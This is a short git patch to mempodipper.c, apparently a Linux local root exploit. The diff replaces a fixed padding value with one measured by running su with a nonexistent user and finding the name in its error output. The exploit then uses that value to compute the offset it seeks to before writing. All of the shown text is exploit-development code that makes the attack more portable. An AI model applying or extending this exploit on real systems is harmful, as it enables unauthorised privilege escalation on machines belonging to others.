From 34d603029eb96fde8bc39a6f10ae84115e11008f Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Sun, 22 Jan 2012 22:02:11 +0100 Subject: Calculate length of su dynamically. --- mempodipper.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/mempodipper.c b/mempodipper.c index 2a80857..64919fa 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -189,7 +189,13 @@ int main(int argc, char **argv) } printf("[+] Resolved exit@plt to 0x%lx.\n", address); } - unsigned long su_padding = strlen("Unknown id: "); + printf("[+] Calculating su padding.\n"); + FILE *command = popen("su this-user-does-not-exist 2>&1", "r"); + char result[256]; + result[0] = 0; + fgets(result, 256, command); + pclose(command); + unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char); unsigned long offset = address - su_padding; printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); -- cgit v1.2.3-59-g8ed1b